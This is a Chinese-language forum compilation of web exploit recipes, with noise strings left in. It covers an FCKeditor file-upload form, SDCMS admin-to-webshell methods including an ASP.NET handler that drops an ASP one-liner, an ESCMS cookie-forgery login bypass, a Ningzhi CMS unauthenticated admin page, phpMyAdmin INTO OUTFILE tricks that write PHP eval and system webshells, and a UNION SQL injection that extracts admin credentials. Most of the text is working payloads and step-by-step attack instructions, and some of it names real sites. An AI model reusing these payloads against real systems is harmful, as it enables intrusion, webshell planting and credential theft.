http://xxoo.com/controls/fckedit ... aspx/connector.aspx
a6 X; `, M! Z$ }/ r跳转到网站根目录上传任意文件。
: }4 ?+ X) k% E; {, F如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件3 [& G. {2 b7 j9 ~' O5 K, Y! F. s
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">* u" g; _: ?! s) C+ l; m) b
Upload a new file:<br>' f: x% E- D& l" d+ s$ p- o
<input type="file" name="NewFile" size="50"><br>
2 t H; J; N7 Q( a" o9 U1 V<input id="btnUpload" type="submit" value="Upload">9 F+ p- m3 ~) c4 S
</form>
7 |6 r6 e' l8 s* [' X1 C) k-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) J% c( `" A/ \ \; m# [3 S9 N
" J) O3 g) t4 l3 w- J, GSDcms 后台拿webshell
7 f8 e5 ]) d' I
2 Y q" P+ d2 G9 i+ ]: g+ U第一种方法:, m& E' b" ?5 Y' c7 U t
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
# ~, s% T9 N' P3 g4 E- `$ C5 f. ~3 ~5 X把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
7 ?; y; V% n$ W T4 f/ C用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。5 |% `' J. t8 u3 F# @
第二种方法:1 O& m! C/ x. Y1 K1 C; D/ N
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
$ C l/ L' i, [4 G& G在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!; g# l) ?) l1 _
第三种方法:
# U$ ~ z' b. R进入后台-->界面管理-->模板文件管理-->创建文件
# z$ p2 ^8 z$ q文件名写入getshell.ashx5 _9 ]! A" p' n& ^
内容写入下面内容:
7 q) f' h# ?' q# ^' o3 ~4 U8 C/====================复制下面的=========================/% p5 ?1 T0 ]9 _! ~
<%@ WebHandler Language="C#" Class="Handler" %>4 G. I" w0 f8 f1 _% r
using System;
. i8 I: N+ m$ Uusing System.Web;2 P$ g/ D7 \1 X
using System.IO;
. _* }0 v o: W: P/ Z. a3 Ppublic class Handler : IHttpHandler { k) L5 q# r4 x: J6 }
public void ProcessRequest (HttpContext context) {
* C, k& b3 ^, j6 r6 {) Zcontext.Response.ContentType = "text/plain";
8 s% B! `4 u* j( \! ~* x* [( AStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp")); f U0 p4 g8 b
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");2 l: O0 ]/ J- l+ i0 `5 {% q% Z5 u
file1.Flush();
" `; |3 \+ Y" N* dfile1.Close();
! x" i( i! C- L; i5 q}" s- P: j' {. |6 w4 N, u
public bool IsReusable {# v* e# C, N- F% V6 Z! M" U
get {8 h" M& w: A# S' O* N
return false;( J4 e) c2 C5 k( V2 R
}
1 W5 E7 ^/ \/ t& S4 W}( P& N1 a4 o8 G2 ?0 E$ E# e
}
$ a" Q& G( n0 ?/=============================================/
) U8 `; N7 L/ B3 R9 Q3 v访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx& P4 B% i5 ^: T3 b1 Q0 c
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
4 g8 L; a4 W; s8 s5 m$ }% s-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 o. |4 W( p0 k/ G7 v
- \ V" A! j% GESCMS网站管理系统0day& G+ y/ Y& m" Q4 F! O
3 ~4 {: o u0 t6 u
后台登陆验证是通过admin/check.asp实现的) p$ q" ?* j8 o: N% l
+ {& n U: h* Y& S首先我们打开http://target.com/admin/es_index.html% P" R- F+ F1 ?" H3 T; s1 ?
然后在COOKIE结尾加上
3 U( F/ B* M) [; ESCMS$_SP2=ES_admin=st0p;
- B1 ~0 V4 N( D" n9 Q& E3 N6 Z# U修改,然后刷新
\: A! {" F& H$ ?4 \, A进后台了嘎..2 f7 c7 n9 [0 p/ b% @1 P- j
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL' |0 y6 [6 q/ x( T* U
, q: G3 U$ S, x1 ~ Y$ q; N3 Q利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交. w3 S- b" d1 _
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp8 E2 I- z% ~; Q J
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..! x3 @+ U/ [7 i; `' g
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了4 z1 s3 z, _( b. d
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 Y* N" h4 v: {7 J, v5 o
& R7 t6 ^0 S+ Z, K) `: v宁志网站管理系统后台无验证漏洞及修复
* h2 C, |9 g4 P3 Q
) ^# {- @ |5 x# [3 A网上搜了一下,好像没有发布.如有雷同纯粹巧合!
' Y! R; Y4 [9 }3 K' d7 M4 O* z官方网站:www.ningzhi.net8 z: K9 r( \$ A; c
学校网站管理系统 V.2011版本 $ N3 W6 W5 y4 @0 s0 L
http://down.chinaz.com/soft/29943.htm
' c! I- F4 V+ C; L其它版本(如:政府版等),自行下载.4 z( `/ z$ W o% {& \
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~0 [& A6 K# ?6 }) [3 i/ q
login.asp代码如下:
' j1 \$ Z& K; q<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
3 Z, T3 ~( I/ C+ q; q) Vmanage.asp代码我就不帖出来了.反正也没验证.
5 ^% _! p) T% z3 x1 z0 X只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!: }8 a+ H: s$ H. S4 U9 D
漏洞利用:; n7 F% i3 g) d$ v/ i: ?3 k/ r
直接访问http://www.0855.tv/admin/manage.asp
9 u G) \/ X. J' K' s数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5# @7 x) K7 q* w3 q, g4 H' f
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' X- X8 }9 {/ a4 Q; U# ?) K+ `& k( C* A M
phpmyadmin拿shell的四种方法总结及修复" ^2 N' @+ W# A2 V
4 l2 s% Z1 x9 i; Q/ V5 o/ _方法一:
& r. e; F6 c( i- v3 ]3 oCREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
( E' i5 {! `& H/ P7 D: _) dINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');. g* y9 F. j" g
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';" `3 t5 j; H8 d% M; s/ k. ?3 ^
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
# \. O- Z5 w/ @! z% \. B 一句话连接密码:7on, I6 w% T& B4 d1 {* e6 x) I
方法二:
! P, U- X0 ~; ?, d读取文件内容: select load_file('E:/xamp/www/s.php');. ~* \! h- V: W7 S" i
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
0 C6 _* s/ u8 g7 Ncmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
- x/ o; J# C. z" N方法三:8 G9 \. ~$ o7 I1 A
JhackJ版本 PHPmyadmin拿shell9 a4 b. i& Z6 k3 Z3 y$ M8 |2 e
Create TABLE study (cmd text NOT NULL);2 \7 H& l( ^6 [& E- }. I$ n
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
1 O" J; o& u, C& nselect cmd from study into outfile 'E:/wamp/www/7.php';
2 I/ x5 Y0 J& O6 C) q9 TDrop TABLE IF EXISTS study;
2 D' l4 U8 H/ n2 h9 {<?php eval($_POST[cmd])?>6 b4 p4 O. u- u
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 D; L2 m1 P" z; lINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
& Y; {: ^( u9 \) [8 [SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
1 K$ s8 ~' U6 A3 a- CDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。. k7 V2 Y. J M% p- N% t
方法四:
/ s- A! G9 v8 o3 eselect load_file('E:/xamp/www/study.php');. Y& T3 X/ q9 ]. U8 |
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
! w! e+ n. G" [0 d9 ^然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
' Y/ _$ \7 F$ T O6 Q2 \-----------------------------------------------------------------------------------------------------------------------------------------------------------------------9 Z3 M2 g: h9 W/ a. J" I' G
4 g" E* ]( D; u' ONO.001中学网站管理系统 Build 110628 注入漏洞
, {; T5 K$ ^& X; u' {& v
& a. S- Z3 V" S# [NO.001中学网站管理系统功能模块:$ ]2 Q' F4 a. k N0 [1 b
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
, L5 x' }+ J1 l% _+ o- Z2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
* J8 |8 _- \# V- T6 |& d( c3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息, B2 I) {; N h. a* Z/ z1 ?
4.视频图片管理:一级分类,动态添加视频或者图片等信息' X. i7 Y" a. u' K
5.留言管理:对留言,修改,删除、回复等管理
! w/ ]2 j% P" U. b6 q6.校友频道:包括校友资料excel导出、管理等功能
! V& s" n# A m! g8 g7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页" f9 g5 @ U- E
默认后台:admin/login.asp
# _! p2 _, T2 \: B7 B0 z" w& a官方演示:http://demo.001cms.net, x9 y* ?5 T0 ?8 ~* `
源码下载地址:http://down.chinaz.com/soft/30187.htm
1 u& }5 i4 D1 gEXP:
( n4 T" f( j2 y/ Aunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin6 L. @/ r" S0 R0 q
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin% `- U) s0 m3 a' c/ o) U
getshell:后台有备份,你懂的8 S' L, a) o$ \* S
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
1 ?& O) H9 H6 Y: C; ?& g------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |